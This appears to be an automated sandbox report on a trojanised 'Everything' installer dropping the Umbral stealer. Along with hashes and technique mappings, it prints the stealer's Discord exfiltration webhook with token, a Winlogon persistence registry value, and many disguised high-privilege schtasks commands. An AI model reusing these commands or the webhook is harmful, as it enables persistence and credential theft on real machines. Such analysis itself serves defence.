umbral | a15cc13813849501ca47b6e923955a19c34b50934d3701fed5df9763174363f3

Analysis

max time kernel
149s
max time network
140s
platform
windows10-2004_x64
resource
win10v2004-20250410-en
resource tags

arch:x64arch:x86image:win10v2004-20250410-enlocale:en-usos:windows10-2004-x64system
submitted
11/04/2025, 11:09

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Everything-1.4.1.1026.x64-Setup2.exe
Size

509KB
MD5

875228165176593a7994f3ca25ca8569
SHA1

b83a002a564e40e4c65c9c6f2fd7aa489ccf564f
SHA256

a15cc13813849501ca47b6e923955a19c34b50934d3701fed5df9763174363f3
SHA512

380fb3ee1611aadace6889efc8a9d0326d242f9b9c01deb6a26501ade860c7308e595f1ef1fbf8be774505849e974538742803a585db2b406560a03b09b7fbc4
SSDEEP

6144:MCvXCoHe6VlWT8b9xsBMHybb88CcbloZM+rIkd8g+EtXHkv/iD48HLECl/8e1mop:woHPVle8bLq5oZtL+EP8KFhwG

Score

10^/10

umbral discovery execution persistence privilege_escalation spyware stealer

Malware Config

Extracted

Family

umbral

https://discord.com/api/webhooks/1360155749258363031/GecIwlE1Thzstr_9VXU3AlsKTdTQmZcn7_F3srTfwPkngR23Mcw5q_eemzqUXyLPFsVY

Signatures

Detect Umbral payload 5 IoCs

resource	yara_rule
behavioral1/files/0x0008000000024208-13.dat	family_umbral
behavioral1/memory/3272-18-0x0000000000400000-0x0000000000487000-memory.dmp	family_umbral
behavioral1/files/0x0007000000024214-51.dat	family_umbral
behavioral1/memory/5296-53-0x0000000000400000-0x0000000000482000-memory.dmp	family_umbral
behavioral1/memory/4728-52-0x0000010307780000-0x00000103077C0000-memory.dmp	family_umbral

Modifies WinLogon for persistence 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\System32\\userinit.exe,C:\\Users\\Admin\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\xdwdAudacity.exe"	Client.exe

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Umbral family
umbral

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4980	powershell.exe
388	powershell.exe
6136	powershell.exe
3792	powershell.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe

Event Triggered Execution: AppInit DLLs 1 TTPs
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes.
persistence privilege_escalation

AppInit DLLs
T1546.010

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3027557611-1484967174-339164627-1000\Control Panel\International\Geo\Nation	Everything-1.4.1.1026.x64-Setup2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3027557611-1484967174-339164627-1000\Control Panel\International\Geo\Nation	Result.exe

Executes dropped EXE 5 IoCs

pid	Process
5840	Everything-1.4.1.1026.x64-Setup.exe
5296	Result.exe
2760	TimerResolution.exe
4652	Client.exe
4728	Umbral.exe

Loads dropped DLL 46 IoCs

pid	Process
6028	Process not Found
4636	Process not Found
5064	Process not Found
3696	Process not Found
1756	Process not Found
3308	Process not Found
2532	Process not Found
4492	Process not Found
868	Process not Found
5936	Process not Found
5368	Process not Found
2888	Process not Found
4004	Process not Found
4040	Process not Found
5836	Process not Found
1220	WmiApSrv.exe
3600	Process not Found
3580	Process not Found
212	Process not Found
3696	Process not Found
4328	Process not Found
2748	Process not Found
4348	Process not Found
3428	Process not Found
4972	Process not Found
5380	Process not Found
724	Process not Found
1860	Process not Found
2092	Process not Found
5200	Process not Found
1284	Process not Found
5056	Process not Found
536	Process not Found
6064	Process not Found
3780	Process not Found
4352	Process not Found
3588	Process not Found
396	Process not Found
5864	Process not Found
3056	Process not Found
4520	Process not Found
3468	Process not Found
4060	Process not Found
2592	Process not Found
2152	Process not Found
1284	Process not Found

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
13	discord.com
14	discord.com
16	pastebin.com
17	pastebin.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
8	ip-api.com
26	icanhazip.com

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\xdwd.dll	Client.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Everything-1.4.1.1026.x64-Setup2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Everything-1.4.1.1026.x64-Setup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Result.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TimerResolution.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
2476	cmd.exe
2144	PING.EXE

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2728	wmic.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2144	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 45 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
5200	schtasks.exe
5384	schtasks.exe
4032	schtasks.exe
3528	schtasks.exe
3892	schtasks.exe
5464	schtasks.exe
5576	schtasks.exe
2420	schtasks.exe
1584	schtasks.exe
1228	schtasks.exe
1072	schtasks.exe
1840	schtasks.exe
4540	schtasks.exe
2288	schtasks.exe
60	schtasks.exe
972	schtasks.exe
5208	schtasks.exe
1248	schtasks.exe
2512	schtasks.exe
1104	schtasks.exe
6096	schtasks.exe
3656	schtasks.exe
5920	schtasks.exe
5888	schtasks.exe
3660	schtasks.exe
5112	schtasks.exe
2216	schtasks.exe
3088	schtasks.exe
4188	schtasks.exe
6040	schtasks.exe
1548	schtasks.exe
1596	schtasks.exe
3172	schtasks.exe
5288	schtasks.exe
3508	schtasks.exe
3708	schtasks.exe
5924	schtasks.exe
1188	schtasks.exe
5064	schtasks.exe
3792	schtasks.exe
5136	schtasks.exe
5048	schtasks.exe
2760	schtasks.exe
428	schtasks.exe
3268	schtasks.exe

Suspicious behavior: EnumeratesProcesses 39 IoCs

pid	Process
4728	Umbral.exe
3792	powershell.exe
3792	powershell.exe
4980	powershell.exe
4980	powershell.exe
388	powershell.exe
388	powershell.exe
2316	powershell.exe
2316	powershell.exe
6136	powershell.exe
6136	powershell.exe
4652	Client.exe
4652	Client.exe
4652	Client.exe
4652	Client.exe
4652	Client.exe
4652	Client.exe
4652	Client.exe
4652	Client.exe
4652	Client.exe
4652	Client.exe
4652	Client.exe
4652	Client.exe
4652	Client.exe
4652	Client.exe
4652	Client.exe
4652	Client.exe
4652	Client.exe
4652	Client.exe
4652	Client.exe
4652	Client.exe
4652	Client.exe
4652	Client.exe
4652	Client.exe
4652	Client.exe
4652	Client.exe
4652	Client.exe
1220	WmiApSrv.exe
1220	WmiApSrv.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4652	Client.exe
Token: SeDebugPrivilege	4728	Umbral.exe
Token: SeIncreaseQuotaPrivilege	3332	wmic.exe
Token: SeSecurityPrivilege	3332	wmic.exe
Token: SeTakeOwnershipPrivilege	3332	wmic.exe
Token: SeLoadDriverPrivilege	3332	wmic.exe
Token: SeSystemProfilePrivilege	3332	wmic.exe
Token: SeSystemtimePrivilege	3332	wmic.exe
Token: SeProfSingleProcessPrivilege	3332	wmic.exe
Token: SeIncBasePriorityPrivilege	3332	wmic.exe
Token: SeCreatePagefilePrivilege	3332	wmic.exe
Token: SeBackupPrivilege	3332	wmic.exe
Token: SeRestorePrivilege	3332	wmic.exe
Token: SeShutdownPrivilege	3332	wmic.exe
Token: SeDebugPrivilege	3332	wmic.exe
Token: SeSystemEnvironmentPrivilege	3332	wmic.exe
Token: SeRemoteShutdownPrivilege	3332	wmic.exe
Token: SeUndockPrivilege	3332	wmic.exe
Token: SeManageVolumePrivilege	3332	wmic.exe
Token: 33	3332	wmic.exe
Token: 34	3332	wmic.exe
Token: 35	3332	wmic.exe
Token: 36	3332	wmic.exe
Token: SeIncreaseQuotaPrivilege	3332	wmic.exe
Token: SeSecurityPrivilege	3332	wmic.exe
Token: SeTakeOwnershipPrivilege	3332	wmic.exe
Token: SeLoadDriverPrivilege	3332	wmic.exe
Token: SeSystemProfilePrivilege	3332	wmic.exe
Token: SeSystemtimePrivilege	3332	wmic.exe
Token: SeProfSingleProcessPrivilege	3332	wmic.exe
Token: SeIncBasePriorityPrivilege	3332	wmic.exe
Token: SeCreatePagefilePrivilege	3332	wmic.exe
Token: SeBackupPrivilege	3332	wmic.exe
Token: SeRestorePrivilege	3332	wmic.exe
Token: SeShutdownPrivilege	3332	wmic.exe
Token: SeDebugPrivilege	3332	wmic.exe
Token: SeSystemEnvironmentPrivilege	3332	wmic.exe
Token: SeRemoteShutdownPrivilege	3332	wmic.exe
Token: SeUndockPrivilege	3332	wmic.exe
Token: SeManageVolumePrivilege	3332	wmic.exe
Token: 33	3332	wmic.exe
Token: 34	3332	wmic.exe
Token: 35	3332	wmic.exe
Token: 36	3332	wmic.exe
Token: SeDebugPrivilege	3792	powershell.exe
Token: SeDebugPrivilege	4980	powershell.exe
Token: SeDebugPrivilege	388	powershell.exe
Token: SeDebugPrivilege	2316	powershell.exe
Token: SeIncreaseQuotaPrivilege	4012	wmic.exe
Token: SeSecurityPrivilege	4012	wmic.exe
Token: SeTakeOwnershipPrivilege	4012	wmic.exe
Token: SeLoadDriverPrivilege	4012	wmic.exe
Token: SeSystemProfilePrivilege	4012	wmic.exe
Token: SeSystemtimePrivilege	4012	wmic.exe
Token: SeProfSingleProcessPrivilege	4012	wmic.exe
Token: SeIncBasePriorityPrivilege	4012	wmic.exe
Token: SeCreatePagefilePrivilege	4012	wmic.exe
Token: SeBackupPrivilege	4012	wmic.exe
Token: SeRestorePrivilege	4012	wmic.exe
Token: SeShutdownPrivilege	4012	wmic.exe
Token: SeDebugPrivilege	4012	wmic.exe
Token: SeSystemEnvironmentPrivilege	4012	wmic.exe
Token: SeRemoteShutdownPrivilege	4012	wmic.exe
Token: SeUndockPrivilege	4012	wmic.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
2760	TimerResolution.exe
2760	TimerResolution.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3272 wrote to memory of 5840	3272	Everything-1.4.1.1026.x64-Setup2.exe	84
PID 3272 wrote to memory of 5840	3272	Everything-1.4.1.1026.x64-Setup2.exe	84
PID 3272 wrote to memory of 5840	3272	Everything-1.4.1.1026.x64-Setup2.exe	84
PID 3272 wrote to memory of 5296	3272	Everything-1.4.1.1026.x64-Setup2.exe	85
PID 3272 wrote to memory of 5296	3272	Everything-1.4.1.1026.x64-Setup2.exe	85
PID 3272 wrote to memory of 5296	3272	Everything-1.4.1.1026.x64-Setup2.exe	85
PID 5296 wrote to memory of 2760	5296	Result.exe	86
PID 5296 wrote to memory of 2760	5296	Result.exe	86
PID 5296 wrote to memory of 2760	5296	Result.exe	86
PID 5296 wrote to memory of 4652	5296	Result.exe	87
PID 5296 wrote to memory of 4652	5296	Result.exe	87
PID 5296 wrote to memory of 4728	5296	Result.exe	88
PID 5296 wrote to memory of 4728	5296	Result.exe	88
PID 4728 wrote to memory of 3332	4728	Umbral.exe	91
PID 4728 wrote to memory of 3332	4728	Umbral.exe	91
PID 4728 wrote to memory of 3524	4728	Umbral.exe	93
PID 4728 wrote to memory of 3524	4728	Umbral.exe	93
PID 4728 wrote to memory of 3792	4728	Umbral.exe	95
PID 4728 wrote to memory of 3792	4728	Umbral.exe	95
PID 4728 wrote to memory of 4980	4728	Umbral.exe	97
PID 4728 wrote to memory of 4980	4728	Umbral.exe	97
PID 4728 wrote to memory of 388	4728	Umbral.exe	99
PID 4728 wrote to memory of 388	4728	Umbral.exe	99
PID 4728 wrote to memory of 2316	4728	Umbral.exe	101
PID 4728 wrote to memory of 2316	4728	Umbral.exe	101
PID 4728 wrote to memory of 4012	4728	Umbral.exe	103
PID 4728 wrote to memory of 4012	4728	Umbral.exe	103
PID 4728 wrote to memory of 428	4728	Umbral.exe	105
PID 4728 wrote to memory of 428	4728	Umbral.exe	105
PID 4728 wrote to memory of 4704	4728	Umbral.exe	107
PID 4728 wrote to memory of 4704	4728	Umbral.exe	107
PID 4728 wrote to memory of 6136	4728	Umbral.exe	109
PID 4728 wrote to memory of 6136	4728	Umbral.exe	109
PID 4728 wrote to memory of 2728	4728	Umbral.exe	111
PID 4728 wrote to memory of 2728	4728	Umbral.exe	111
PID 4728 wrote to memory of 2476	4728	Umbral.exe	113
PID 4728 wrote to memory of 2476	4728	Umbral.exe	113
PID 2476 wrote to memory of 2144	2476	cmd.exe	115
PID 2476 wrote to memory of 2144	2476	cmd.exe	115
PID 4652 wrote to memory of 840	4652	Client.exe	117
PID 4652 wrote to memory of 840	4652	Client.exe	117
PID 840 wrote to memory of 5200	840	CMD.exe	119
PID 840 wrote to memory of 5200	840	CMD.exe	119
PID 4652 wrote to memory of 5720	4652	Client.exe	120
PID 4652 wrote to memory of 5720	4652	Client.exe	120
PID 5720 wrote to memory of 1548	5720	CMD.exe	122
PID 5720 wrote to memory of 1548	5720	CMD.exe	122
PID 4652 wrote to memory of 3644	4652	Client.exe	123
PID 4652 wrote to memory of 3644	4652	Client.exe	123
PID 3644 wrote to memory of 1248	3644	CMD.exe	125
PID 3644 wrote to memory of 1248	3644	CMD.exe	125
PID 4652 wrote to memory of 3276	4652	Client.exe	127
PID 4652 wrote to memory of 3276	4652	Client.exe	127
PID 3276 wrote to memory of 1584	3276	CMD.exe	129
PID 3276 wrote to memory of 1584	3276	CMD.exe	129
PID 4652 wrote to memory of 2552	4652	Client.exe	130
PID 4652 wrote to memory of 2552	4652	Client.exe	130
PID 2552 wrote to memory of 3660	2552	CMD.exe	132
PID 2552 wrote to memory of 3660	2552	CMD.exe	132
PID 4652 wrote to memory of 1012	4652	Client.exe	133
PID 4652 wrote to memory of 1012	4652	Client.exe	133
PID 1012 wrote to memory of 2512	1012	CMD.exe	135
PID 1012 wrote to memory of 2512	1012	CMD.exe	135
PID 4652 wrote to memory of 4352	4652	Client.exe	136

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
3524	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Everything-1.4.1.1026.x64-Setup2.exe
"C:\Users\Admin\AppData\Local\Temp\Everything-1.4.1.1026.x64-Setup2.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3272
- C:\Users\Admin\AppData\Local\Temp\Everything-1.4.1.1026.x64-Setup.exe
  "C:\Users\Admin\AppData\Local\Temp\Everything-1.4.1.1026.x64-Setup.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:5840
- C:\Users\Admin\AppData\Local\Temp\Result.exe
  "C:\Users\Admin\AppData\Local\Temp\Result.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:5296
- - C:\Users\Admin\AppData\Local\Temp\TimerResolution.exe
    "C:\Users\Admin\AppData\Local\Temp\TimerResolution.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:2760
- - C:\Users\Admin\AppData\Local\Temp\Client.exe
    "C:\Users\Admin\AppData\Local\Temp\Client.exe"
    3⤵
    - Modifies WinLogon for persistence
    - Executes dropped EXE
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4652
  - - C:\Windows\SYSTEM32\CMD.exe
      "CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Microsoft Security Essentials" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" & exit
      4⤵
      Suspicious use of WriteProcessMemory
      PID:840
    - - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Microsoft Security Essentials" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe"
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5200
  - - C:\Windows\SYSTEM32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST & exit
      4⤵
      Suspicious use of WriteProcessMemory
      PID:5720
    - - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1548
  - - C:\Windows\SYSTEM32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "7-Zip" /tr "C:\Users\Admin\Videos\xdwdMicrosoft Excel.exe" /RL HIGHEST & exit
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3644
    - - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo 5 /tn "7-Zip" /tr "C:\Users\Admin\Videos\xdwdMicrosoft Excel.exe" /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1248
  - - C:\Windows\SYSTEM32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST & exit
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3276
    - - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1584
  - - C:\Windows\SYSTEM32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST & exit
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2552
    - - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3660
  - - C:\Windows\SYSTEM32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST & exit
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1012
    - - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2512
  - - C:\Windows\SYSTEM32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST & exit
      4⤵
      PID:4352
    - - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5048
  - - C:\Windows\SYSTEM32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST & exit
      4⤵
      PID:2124
    - - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1228
  - - C:\Windows\SYSTEM32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST & exit
      4⤵
      PID:8
    - - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5384
  - - C:\Windows\SYSTEM32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST & exit
      4⤵
      PID:4404
    - - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3508
  - - C:\Windows\SYSTEM32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST & exit
      4⤵
      PID:3056
    - - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1596
  - - C:\Windows\SYSTEM32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST & exit
      4⤵
      PID:2880
    - - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2760
  - - C:\Windows\SYSTEM32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST & exit
      4⤵
      PID:1604
    - - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4032
  - - C:\Windows\SYSTEM32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST & exit
      4⤵
      PID:468
    - - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:428
  - - C:\Windows\SYSTEM32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST & exit
      4⤵
      PID:5060
    - - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1104
  - - C:\Windows\SYSTEM32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST & exit
      4⤵
      PID:4884
    - - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:6096
  - - C:\Windows\SYSTEM32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST & exit
      4⤵
      PID:4764
    - - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3656
  - - C:\Windows\SYSTEM32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST & exit
      4⤵
      PID:4596
    - - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5112
  - - C:\Windows\SYSTEM32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST & exit
      4⤵
      PID:2832
    - - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2216
  - - C:\Windows\SYSTEM32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST & exit
      4⤵
      PID:5048
    - - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3528
  - - C:\Windows\SYSTEM32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Adobe Photoshop Upgrade" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdAudacity.exe" /RL HIGHEST & exit
      4⤵
      PID:4276
    - - C:\Windows\system32\schtasks.exe
        
